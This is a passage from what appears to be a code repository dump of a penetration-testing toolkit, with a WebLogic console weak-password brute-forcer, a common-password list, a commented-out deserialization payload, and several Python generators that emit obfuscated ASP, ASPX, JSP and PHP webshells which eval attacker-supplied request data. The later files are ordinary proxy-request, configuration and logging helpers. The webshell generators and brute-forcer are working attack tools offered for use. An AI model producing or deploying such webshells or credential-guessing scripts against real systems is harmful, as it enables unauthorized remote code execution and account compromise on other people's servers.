57 | #payload = '\x00\x00\x05\xf5\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x45\x0b\xfc\xbc\xe1\xa6\x4c\x6e\x64\x7e\xc1\x80\xa4\x05\x7c\x87\x3f\x63\x5c\x2d\x49\x1f\x20\x49\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00'
58 | #payload=payload.encode()+payloadObj
59 |
60 | # adjust header for appropriate message length
61 | #payload=struct.pack('>I',len(payload)) + payload[4:]
62 |
63 | #print('[+] Sending payload...')
64 | #sock.send(payload)
65 | #data = sock.recv(1024)
66 | #print('received "%s"' % data)
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
--------------------------------------------------------------------------------
/POC/Weblogic_weakPass.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 |
4 | print('[*]Usage: [IP] [7001]')
5 | def check(**kwargs):
6 | url = kwargs['url']
7 | port = int('80')
8 | """weak password"""
9 |
10 | pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem', 'weblogic123', 'Weblogic123']
11 | for user in pwddict:
12 | for pwd in pwddict:
13 | data = {
14 | 'j_username':user,
15 | 'j_password':pwd,
16 | 'j_character_encoding':'UTF-8'
17 | }
18 | req = requests.post('http://'+url+':'+str(port)+'/console/j_security_check', data=data, allow_redirects=False, verify=False, timeout=3)
19 |
20 | if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
21 | print('[+] WebLogic username: '+user+' password: '+pwd)
22 | return 1
23 | print('[-]don not have weakPass!')
24 | return
25 |
26 |
27 |
28 |
29 |
30 |
31 |
--------------------------------------------------------------------------------
/POC/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/POC/__init__.py
--------------------------------------------------------------------------------
/POC/js_examples/enpassword.js:
--------------------------------------------------------------------------------
1 | /**
2 | *@param username
3 | *@param passwordOrgin
4 | *@return encrypt password for $username who use orign password $passwordOrgin
5 | *
6 | **/
7 |
8 | function encrypt(username, passwordOrgin) {
9 | return hex_sha1(username+hex_sha1(passwordOrgin));
10 | }
11 |
12 |
13 |
14 | function hex_sha1(s, hexcase) {
15 | if (!(arguments) || !(arguments.length) || arguments.length < 1) {
16 | return binb2hex(core_sha1(AlignSHA1("aiact@163.com")), true);
17 | } else {
18 | if (arguments.length == 1) {
19 | return binb2hex(core_sha1(AlignSHA1(arguments[0])), true);
20 | } else {
21 | return binb2hex(core_sha1(AlignSHA1(arguments[0])), arguments[1]);
22 | }
23 | }
24 | // return binb2hex(core_sha1(AlignSHA1(s)),hexcase);
25 | }
26 | /**/
27 | /*
28 | * Perform a simple self-test to see if the VM is working
29 | */
30 | function sha1_vm_test() {
31 | return hex_sha1("abc",false) == "a9993e364706816aba3e25717850c26c9cd0d89d";
32 | }
33 | /**/
34 | /*
35 | * Calculate the SHA-1 of an array of big-endian words, and a bit length
36 | */
37 | function core_sha1(blockArray) {
38 | var x = blockArray; //append padding
39 | var w = Array(80);
40 | var a = 1732584193;
41 | var b = -271733879;
42 | var c = -1732584194;
43 | var d = 271733878;
44 | var e = -1009589776;
45 | for (var i = 0; i < x.length; i += 16) { //每次处理512位 16*32
46 | var olda = a;
47 | var oldb = b;
48 | var oldc = c;
49 | var oldd = d;
50 | var olde = e;
51 | for (var j = 0; j < 80; j += 1) { //对每个512位进行80步操作
52 | if (j < 16) {
53 | w[j] = x[i + j];
54 | } else {
55 | w[j] = rol(w[j - 3] ^ w[j - 8] ^ w[j - 14] ^ w[j - 16], 1);
56 | }
57 | var t = safe_add(safe_add(rol(a, 5), sha1_ft(j, b, c, d)), safe_add(safe_add(e, w[j]), sha1_kt(j)));
58 | e = d;
59 | d = c;
60 | c = rol(b, 30);
61 | b = a;
62 | a = t;
63 | }
64 | a = safe_add(a, olda);
65 | b = safe_add(b, oldb);
66 | c = safe_add(c, oldc);
67 | d = safe_add(d, oldd);
68 | e = safe_add(e, olde);
69 | }
70 | return new Array(a, b, c, d, e);
71 | }
72 | /**/
73 | /*
74 | * Perform the appropriate triplet combination function for the current iteration
75 | * 返回对应F函数的值
76 | */
77 | function sha1_ft(t, b, c, d) {
78 | if (t < 20) {
79 | return (b & c) | ((~b) & d);
80 | }
81 | if (t < 40) {
82 | return b ^ c ^ d;
83 | }
84 | if (t < 60) {
85 | return (b & c) | (b & d) | (c & d);
86 | }
87 | return b ^ c ^ d; //t<80
88 | }
89 | /**/
90 | /*
91 |
92 | * Determine the appropriate additive constant for the current iteration
93 | * 返回对应的Kt值
94 | */
95 | function sha1_kt(t) {
96 | return (t < 20) ? 1518500249 : (t < 40) ? 1859775393 : (t < 60) ? -1894007588 : -899497514;
97 | }
98 | /**/
99 | /*
100 | * Add integers, wrapping at 2^32. This uses 16-bit operations internally
101 | * to work around bugs in some JS interpreters.
102 | * 将32位数拆成高16位和低16位分别进行相加,从而实现 MOD 2^32 的加法
103 | */
104 | function safe_add(x, y) {
105 | var lsw = (x & 65535) + (y & 65535);
106 | var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
107 | return (msw << 16) | (lsw & 65535);
108 | }
109 | /**/
110 | /*
111 | * Bitwise rotate a 32-bit number to the left.
112 | * 32位二进制数循环左移
113 | */
114 | function rol(num, cnt) {
115 | return (num << cnt) | (num >>> (32 - cnt));
116 | }
117 | /**/
118 | /*
119 |
120 | * The standard SHA1 needs the input string to fit into a block
121 |
122 | * This function align the input string to meet the requirement
123 |
124 | */
125 | function AlignSHA1(str) {
126 | var nblk = ((str.length + 8) >> 6) + 1, blks = new Array(nblk * 16);
127 | for (var i = 0; i < nblk * 16; i += 1) {
128 | blks[i] = 0;
129 | }
130 | for (i = 0; i < str.length; i += 1) {
131 | blks[i >> 2] |= str.charCodeAt(i) << (24 - (i & 3) * 8);
132 | }
133 | blks[i >> 2] |= 128 << (24 - (i & 3) * 8);
134 | blks[nblk * 16 - 1] = str.length * 8;
135 | return blks;
136 | }
137 | /**/
138 | /*
139 | * Convert an array of big-endian words to a hex string.
140 | */
141 | function binb2hex(binarray, hexcase) {
142 | var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
143 | var str = "";
144 | for (var i = 0; i < binarray.length * 4; i += 1) {
145 | str += hex_tab.charAt((binarray[i >> 2] >> ((3 - i % 4) * 8 + 4)) & 15) + hex_tab.charAt((binarray[i >> 2] >> ((3 - i % 4) * 8)) & 15);
146 | }
147 | return str;
148 | }
149 |
150 |
--------------------------------------------------------------------------------
/POC/js_examples/top100password.txt:
--------------------------------------------------------------------------------
1 | 123456789
2 | a123456
3 | 123456
4 | a123456789
5 | 1234567890
6 | woaini1314
7 | qq123456
8 | abc123456
9 | 123456a
10 | 123456789a
11 | 147258369
12 | zxcvbnm
13 | 987654321
14 | 12345678910
15 | abc123
16 | qq123456789
17 | 123456789.
18 | 7708801314520
19 | woaini
20 | 5201314520
21 | q123456
22 | 123456abc
23 | 1233211234567
24 | 123123123
25 | 123456.
26 | 0123456789
27 | asd123456
28 | aa123456
29 | 135792468
30 | q123456789
31 | abcd123456
32 | 12345678900
33 | woaini520
34 | woaini123
35 | zxcvbnm123
36 | 1111111111111111
37 | w123456
38 | aini1314
39 | abc123456789
40 | 111111
41 | woaini521
42 | qwertyuiop
43 | 1314520520
44 | 1234567891
45 | qwe123456
46 | asd123
47 | 000000
48 | 1472583690
49 | 1357924680
50 | 789456123
51 | 123456789abc
52 | z123456
53 | 1234567899
54 | aaa123456
55 | abcd1234
56 | www123456
57 | 123456789q
58 | 123abc
59 | qwe123
60 | w123456789
61 | 7894561230
62 | 123456qq
63 | zxc123456
64 | 123456789qq
65 | 1111111111
66 | 111111111
67 | 0000000000000000
68 | 1234567891234567
69 | qazwsxedc
70 | qwerty
71 | 123456..
72 | zxc123
73 | asdfghjkl
74 | 0000000000
75 | 1234554321
76 | 123456q
77 | 123456aa
78 | 9876543210
79 | 110120119
80 | qaz123456
81 | qq5201314
82 | 123698745
83 | 5201314
84 | 000000000
85 | as123456
86 | 123123
87 | 5841314520
88 | z123456789
89 | 52013145201314
90 | a123123
91 | caonima
92 | a5201314
93 | wang123456
94 | abcd123
95 | 123456789..
96 | woaini1314520
97 | 123456asd
98 | aa123456789
99 | 741852963
100 | a12345678
--------------------------------------------------------------------------------
/POC/webshell_asp.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 |
6 | shell = '''<%
7 |
17 |
18 | %>'''
19 |
20 |
21 |
22 | def random_name(len):
23 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
24 | return ''.join(random.sample(str,len))
25 |
26 | def build_webshell():
27 | FunctionName = random_name(4)
28 | parameter = random_name(4)
29 | FunctionName1 = random_name(4)
30 | shellc = shell.format(FunctionName,parameter,FunctionName1)
31 | return shellc
32 |
33 | def check(**kwargs):
34 | print (build_webshell())
35 |
36 |
37 | if __name__ == '__main__':
38 | print (build_webshell())
--------------------------------------------------------------------------------
/POC/webshell_aspx.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 |
6 | shell = '''<%@ Page Language="Jscript" Debug=true%>
7 | <%
8 | var {0}=Request.Form["pureqh"];
9 | var {1}="unsa",{5}="fe",{4}={1}+{5};
10 | function {2}()
11 | {6}
12 | return {0};
13 | {7}
14 | function {3}()
15 | {6}
16 | eval({2}(),{4});
17 | {7}
18 | {3}()
19 | %>'''
20 |
21 |
22 |
23 | def random_name(len):
24 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
25 | return ''.join(random.sample(str,len))
26 |
27 | def build_webshell():
28 | parameter = random_name(2)
29 | parameter1 = random_name(3)
30 | FunctionName = random_name(4)
31 | FunctionName1 = random_name(5)
32 | parameter2 = random_name(6)
33 | parameter3 = random_name(7)
34 | lef = '''{'''
35 | rig = '''}'''
36 | shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig)
37 | return shellc
38 | def check(**kwargs):
39 | print (build_webshell())
40 |
41 | if __name__ == '__main__':
42 | print (build_webshell())
--------------------------------------------------------------------------------
/POC/webshell_aspx_D.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 |
6 | shell = '''<%@ Page Language="Jscript" Debug=true%>
7 | <%
8 | function {2}()
9 | {6}
10 | var {0}=Request.Form["zero"];
11 | return {0};
12 | {7}
13 | function {3}()
14 | {6}
15 | var {1}="unsa",{5}="fe",{4}={1}+{5};
16 | eval({2}(),{4});
17 | {7}
18 | {3}()
19 | %>'''
20 |
21 |
22 |
23 | def random_name(len):
24 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
25 | return ''.join(random.sample(str,len))
26 |
27 | def build_webshell():
28 | parameter = random_name(4)
29 | parameter1 = random_name(4)
30 | FunctionName = random_name(4)
31 | FunctionName1 = random_name(4)
32 | parameter2 = random_name(4)
33 | parameter3 = random_name(4)
34 | lef = '''{'''
35 | rig = '''}'''
36 | shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig)
37 | return shellc
38 | def check(**kwargs):
39 | print (build_webshell())
40 |
41 | if __name__ == '__main__':
42 | print (build_webshell())
--------------------------------------------------------------------------------
/POC/webshell_jsp.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 |
6 | shell = '''<%!class {2} extends ClassLoader{0} {2}(ClassLoader {3}){0} super({3}); {1}public Class g(byte []b){0} return super.defineClass(b,0,b.length); {1}{1}%><% String cls=request.getParameter("zero");if(cls!=null){0} new {2}(this.\u0067etClass().\u0067etClassLoader()).g(new sun.misc.{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}().decodeBuffer(cls)).newInstance().equals(pageContext); {1}%>
7 | '''
8 |
9 |
10 |
11 | def random_name(len):
12 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
13 | return ''.join(random.sample(str,len))
14 |
15 | def build_webshell():
16 | arr1 = ['\u0042','B']
17 | arr2 = ['\u0041','A']
18 | arr3 = ['\u0053','S']
19 | arr4 = ['\u0045','E']
20 | arr5 = ['\u0036','6']
21 | arr6 = ['\u0034','4']
22 | arr7 = ['\u0044','D']
23 | arr8 = ['\u0065','e']
24 | arr9 = ['\u0063','c']
25 | arr10 = ['\u006f','o']
26 | arr11 = ['\u0064','d']
27 | arr12 = ['\u0065','e']
28 | arr13 = ['\u0072','r']
29 |
30 | lef = '''{'''
31 | rig = '''}'''
32 | var1 = random_name(4)
33 | var2 = random_name(4)
34 | var3 = random.choice(arr1)
35 | var4 = random.choice(arr2)
36 | var5 = random.choice(arr3)
37 | var6 = random.choice(arr4)
38 | var7 = random.choice(arr5)
39 | var8 = random.choice(arr6)
40 | var9 = random.choice(arr7)
41 | var10 = random.choice(arr8)
42 | var11 = random.choice(arr9)
43 | var12 = random.choice(arr10)
44 | var13 = random.choice(arr11)
45 | var14 = random.choice(arr12)
46 | var15 = random.choice(arr13)
47 | shellc = shell.format(lef,rig,var1,var2,var3,var4,var5,var6,var7,var8,var9,var10,var11,var12,var13,var14,var15)
48 | return shellc
49 |
50 | def check(**kwargs):
51 | print (build_webshell())
52 | if __name__ == '__main__':
53 | print (build_webshell())
--------------------------------------------------------------------------------
/POC/webshell_php.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 | #use:GET:http://url?pass=pureqh POST:zero
6 |
7 | shell = '''{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
14 | $this->{3} = @{9}($this->{2});
15 | @eval({5}.$this->{3}.{5});
16 | {4}{4}{4}
17 | new {0}();
18 | function {6}(${7}){1}
19 | $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
20 | ${8} = '';
21 | $v = 0;
22 | $vbits = 0;
23 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
24 | $v <<= 8;
25 | $v += ord(${7}[$i]);
26 | $vbits += 8;
27 | while ($vbits >= 5) {1}
28 | $vbits -= 5;
29 | ${8} .= $BASE32_ALPHABET[$v >> $vbits];
30 | $v &= ((1 << $vbits) - 1);{4}{4}
31 | if ($vbits > 0){1}
32 | $v <<= (5 - $vbits);
33 | ${8} .= $BASE32_ALPHABET[$v];{4}
34 | return ${8};{4}
35 | function {9}(${7}){1}
36 | ${8} = '';
37 | $v = 0;
38 | $vbits = 0;
39 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
40 | $v <<= 5;
41 | if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
42 | $v += (ord(${7}[$i]) - 97);
43 | {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
44 | $v += (24 + ${7}[$i]);
45 | {4} else {1}
46 | exit(1);
47 | {4}
48 | $vbits += 5;
49 | while ($vbits >= 8){1}
50 | $vbits -= 8;
51 | ${8} .= chr($v >> $vbits);
52 | $v &= ((1 << $vbits) - 1);{4}{4}
53 | return ${8};{4}
54 | ?>'''
55 |
56 |
57 | def random_keys(len):
58 | str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
59 | return ''.join(random.sample(str,len))
60 |
61 | def random_name(len):
62 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
63 | return ''.join(random.sample(str,len))
64 |
65 | def build_webshell():
66 | className = random_name(4)
67 | lef = '''{'''
68 | parameter1 = random_name(4)
69 | parameter2 = random_name(4)
70 | rig = '''}'''
71 | disrupt = "\"/*"+random_keys(7)+"*/\""
72 | fun1 = random_name(4)
73 | fun1_vul = random_name(4)
74 | fun1_ret = random_name(4)
75 | fun2 = random_name(4)
76 | shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
77 | return shellc
78 | def check(**kwargs):
79 | print (build_webshell())
80 |
81 | if __name__ == '__main__':
82 | print (build_webshell())
83 |
--------------------------------------------------------------------------------
/POC/webshell_php_D.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 | #author: pureqh
4 | #github: https://github.com/pureqh/webshell
5 | #use: POST:zero
6 |
7 | shell = '''{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
13 | $this->{3} = @{9}($this->{2});
14 | @eval({5}.$this->{3}.{5});
15 | {4}{4}
16 | new {0}();
17 | function {6}(${7}){1}
18 | $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
19 | ${8} = '';
20 | $v = 0;
21 | $vbits = 0;
22 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
23 | $v <<= 8;
24 | $v += ord(${7}[$i]);
25 | $vbits += 8;
26 | while ($vbits >= 5) {1}
27 | $vbits -= 5;
28 | ${8} .= $BASE32_ALPHABET[$v >> $vbits];
29 | $v &= ((1 << $vbits) - 1);{4}{4}
30 | if ($vbits > 0){1}
31 | $v <<= (5 - $vbits);
32 | ${8} .= $BASE32_ALPHABET[$v];{4}
33 | return ${8};{4}
34 | function {9}(${7}){1}
35 | ${8} = '';
36 | $v = 0;
37 | $vbits = 0;
38 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
39 | $v <<= 5;
40 | if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
41 | $v += (ord(${7}[$i]) - 97);
42 | {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
43 | $v += (24 + ${7}[$i]);
44 | {4} else {1}
45 | exit(1);
46 | {4}
47 | $vbits += 5;
48 | while ($vbits >= 8){1}
49 | $vbits -= 8;
50 | ${8} .= chr($v >> $vbits);
51 | $v &= ((1 << $vbits) - 1);{4}{4}
52 | return ${8};{4}
53 | ?>'''
54 |
55 |
56 | def random_keys(len):
57 | str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
58 | return ''.join(random.sample(str,len))
59 |
60 | def random_name(len):
61 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
62 | return ''.join(random.sample(str,len))
63 |
64 | def build_webshell():
65 | className = random_name(4)
66 | lef = '''{'''
67 | parameter1 = random_name(4)
68 | parameter2 = random_name(4)
69 | rig = '''}'''
70 | disrupt = "\"/*"+random_keys(7)+"*/\""
71 | fun1 = random_name(4)
72 | fun1_vul = random_name(4)
73 | fun1_ret = random_name(4)
74 | fun2 = random_name(4)
75 | shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
76 | return shellc
77 |
78 | def check(**kwargs):
79 | print (build_webshell())
80 | if __name__ == '__main__':
81 | print (build_webshell())
--------------------------------------------------------------------------------
/POC/模板.py:
--------------------------------------------------------------------------------
1 | inp = b'\xac\xed'
2 |
3 | print(format(int(inp, 16), 'b'))
--------------------------------------------------------------------------------
/Proxy/WebRequest.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: WebRequest
5 | Description : Network Requests Class
6 | Author : J_hao
7 | date: 2017/7/31
8 | -------------------------------------------------
9 | Change Activity:
10 | 2017/7/31:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'J_hao'
14 |
15 | from requests.models import Response
16 | from lxml import etree
17 | import requests
18 | import random
19 | import time
20 |
21 | from Proxy.handler.logHandler import LogHandler
22 |
23 | requests.packages.urllib3.disable_warnings()
24 |
25 |
26 | class WebRequest(object):
27 | name = "Web_Request"
28 |
29 | def __init__(self, *args, **kwargs):
30 | self.log = LogHandler(self.name, file=False)
31 | self.response = Response()
32 | #self.log = logging.getLogger("web_request")
33 | #self.log.setLevel(logging.DEBUG)
34 | #self.response = Response()
35 |
36 | @property
37 | def user_agent(self):
38 | """
39 | return an User-Agent at random
40 | :return:
41 | """
42 | ua_list = [
43 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101',
44 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122',
45 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71',
46 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95',
47 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71',
48 | 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)',
49 | 'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50',
50 | 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
51 | ]
52 | return random.choice(ua_list)
53 |
54 | @property
55 | def header(self):
56 | """
57 | basic header
58 | :return:
59 | """
60 | return {'User-Agent': self.user_agent,
61 | 'Accept': '*/*',
62 | 'Connection': 'keep-alive',
63 | 'Accept-Language': 'zh-CN,zh;q=0.8'}
64 |
65 | def get(self, url, header=None, retry_time=3, retry_interval=5, timeout=5, *args, **kwargs):
66 | """
67 | get method
68 | :param url: target url
69 | :param header: headers
70 | :param retry_time: retry time
71 | :param retry_interval: retry interval
72 | :param timeout: network timeout
73 | :return:
74 | """
75 | headers = self.header
76 | if header and isinstance(header, dict):
77 | headers.update(header)
78 | while True:
79 | try:
80 | self.response = requests.get(url, headers=headers, timeout=timeout, verify=False, *args, **kwargs)
81 | return self
82 | except Exception as e:
83 | self.log.error("requests: %s error: %s" % (url, str(e)))
84 | retry_time -= 1
85 | if retry_time <= 0:
86 | resp = Response()
87 | resp.status_code = 200
88 | return self
89 | self.log.info("retry %s second after" % retry_interval)
90 | time.sleep(retry_interval)
91 |
92 | def respheader(self, key):
93 | try:
94 | return self.response.headers[key]
95 | except Exception as e:
96 | print(str(e))
97 | return ''
98 |
99 | @property
100 | def code(self):
101 | encodings = requests.utils.get_encodings_from_content(self.response.text)
102 | if encodings:
103 | return encodings[0]
104 | else:
105 | return self.response.apparent_encoding
106 |
107 | @property
108 | def tree(self):
109 | return etree.HTML(self.response.content.decode(self.code, 'ignore'))
110 |
111 | @property
112 | def text(self):
113 | return self.response.text
114 |
115 | @property
116 | def json(self):
117 | try:
118 | return self.response.json()
119 | except Exception as e:
120 | self.log.error(str(e))
121 | return {}
--------------------------------------------------------------------------------
/Proxy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/__init__.py
--------------------------------------------------------------------------------
/Proxy/handler/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: __init__.py
5 | Description :
6 | Author : JHao
7 | date: 2016/12/3
8 | -------------------------------------------------
9 | Change Activity:
10 | 2016/12/3:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | # from handler.ProxyManager import ProxyManager
16 |
--------------------------------------------------------------------------------
/Proxy/handler/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/handler/__pycache__/configHandler.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/configHandler.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/handler/__pycache__/logHandler.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/logHandler.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/handler/__pycache__/proxyHandler.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/proxyHandler.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/handler/configHandler.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: configHandler
5 | Description :
6 | Author : JHao
7 | date: 2020/6/22
8 | -------------------------------------------------
9 | Change Activity:
10 | 2020/6/22:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | import os
16 | import Proxy.proxySetting as setting
17 | from Proxy.util.singleton import Singleton
18 | from Proxy.util.lazyProperty import LazyProperty
19 | from Proxy.util.six import reload_six, withMetaclass
20 |
21 |
22 | class ConfigHandler(withMetaclass(Singleton)):
23 |
24 | def __init__(self):
25 | pass
26 |
27 | #@LazyProperty
28 | #def serverHost(self):
29 | # return os.environ.get("HOST", setting.HOST)
30 |
31 | #@LazyProperty
32 | #def serverPort(self):
33 | # return os.environ.get("PORT", setting.PORT)
34 |
35 | #@LazyProperty
36 | #def dbConn(self):
37 | # return os.getenv("DB_CONN", setting.DB_CONN)
38 |
39 | #@LazyProperty
40 | #def tableName(self):
41 | # return os.getenv("TABLE_NAME", setting.TABLE_NAME)
42 |
43 | #@property
44 | #def fetchers(self):
45 | # reload_six(setting)
46 | # return setting.PROXY_FETCHER
47 |
48 | @LazyProperty
49 | def httpUrl(self):
50 | return os.getenv("HTTP_URL", setting.HTTP_URL)
51 |
52 | @LazyProperty
53 | def httpsUrl(self):
54 | return os.getenv("HTTPS_URL", setting.HTTPS_URL)
55 |
56 | @LazyProperty
57 | def verifyTimeout(self):
58 | return os.getenv("VERIFY_TIMEOUT", setting.VERIFY_TIMEOUT)
59 |
60 | # @LazyProperty
61 | # def proxyCheckCount(self):
62 | # return os.getenv("PROXY_CHECK_COUNT", setting.PROXY_CHECK_COUNT)
63 |
64 | @LazyProperty
65 | def maxFailCount(self):
66 | return os.getenv("MAX_FAIL_COUNT", setting.MAX_FAIL_COUNT)
67 |
68 | # @LazyProperty
69 | # def maxFailRate(self):
70 | # return os.getenv("MAX_FAIL_RATE", setting.MAX_FAIL_RATE)
71 |
72 | @LazyProperty
73 | def poolSizeMin(self):
74 | return os.getenv("POOL_SIZE_MIN", setting.POOL_SIZE_MIN)
75 |
76 | @LazyProperty
77 | def timezone(self):
78 | return os.getenv("TIMEZONE", setting.TIMEZONE)
79 |
80 |
--------------------------------------------------------------------------------
/Proxy/handler/logHandler.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: LogHandler.py
5 | Description : 日志操作模块
6 | Author : JHao
7 | date: 2017/3/6
8 | -------------------------------------------------
9 | Change Activity:
10 | 2017/03/06: log handler
11 | 2017/09/21: 屏幕输出/文件输出 可选(默认屏幕和文件均输出)
12 | 2020/07/13: Windows下TimedRotatingFileHandler线程不安全, 不再使用
13 | -------------------------------------------------
14 | """
15 | __author__ = 'JHao'
16 |
17 | import os
18 | import logging
19 | import platform
20 |
21 | from logging.handlers import TimedRotatingFileHandler
22 | from logging import FileHandler
23 |
24 | # 日志级别
25 | CRITICAL = 50
26 | FATAL = CRITICAL
27 | ERROR = 40
28 | WARNING = 30
29 | WARN = WARNING
30 | INFO = 20
31 | DEBUG = 10
32 | NOTSET = 0
33 |
34 | CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
35 | ROOT_PATH = os.path.join(CURRENT_PATH, os.pardir)
36 | LOG_PATH = os.path.join(ROOT_PATH, 'log')
37 |
38 | if not os.path.exists(LOG_PATH):
39 | try:
40 | os.mkdir(LOG_PATH)
41 | except FileExistsError:
42 | pass
43 |
44 |
45 | class LogHandler(logging.Logger):
46 | """
47 | LogHandler
48 | """
49 |
50 | def __init__(self, name, level=DEBUG, stream=False, file=True):
51 | self.name = name
52 | self.level = level
53 | logging.Logger.__init__(self, self.name, level=level)
54 | if stream:
55 | self.__setStreamHandler__()
56 | if file:
57 | if platform.system() == "Windows":
58 | self.__setFileHandler__()
59 |
60 | def __setFileHandler__(self, level=None):
61 | """
62 | set file handler
63 | :param level:
64 | :return:
65 | """
66 | file_name = os.path.join(LOG_PATH, '{name}.log'.format(name=self.name))
67 | # 设置日志回滚, 保存在log目录, 一天保存一个文件, 保留15天
68 | file_handler = TimedRotatingFileHandler(filename=file_name, when='D', interval=1, backupCount=15)
69 | #file_handler = FileHandler(filename=file_name, mode='a', encoding='utf-8')
70 | file_handler.suffix = '%Y%m%d.log'
71 | if not level:
72 | file_handler.setLevel(self.level)
73 | else:
74 | file_handler.setLevel(level)
75 | formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')
76 |
